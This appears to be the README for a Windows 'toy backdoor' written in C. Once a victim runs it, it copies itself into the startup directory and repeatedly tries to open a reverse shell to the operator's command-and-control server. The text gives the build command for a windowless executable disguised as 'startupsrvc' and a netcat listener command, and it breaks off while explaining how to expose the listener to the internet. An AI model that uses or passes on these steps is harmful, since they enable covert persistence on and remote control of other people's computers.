A simple, persisent windows toy backdoor spawning a reverse shell.
Once the victim starts the executable it locates itself on default startup programs directory,
then it tries to connect to establish a connection every 30 seconds.
Edit the 8 and 9 lines with your own C2 server and port.
gcc barbie.c -o startupsrvc -w -lws2_32 -mwindows
-
First start a TCP listener on your localhost for incoming connections.
With netcat:nc -lvnp <PORT>
-
Now you have to expose your localhost on the internet, there are various methods to do this: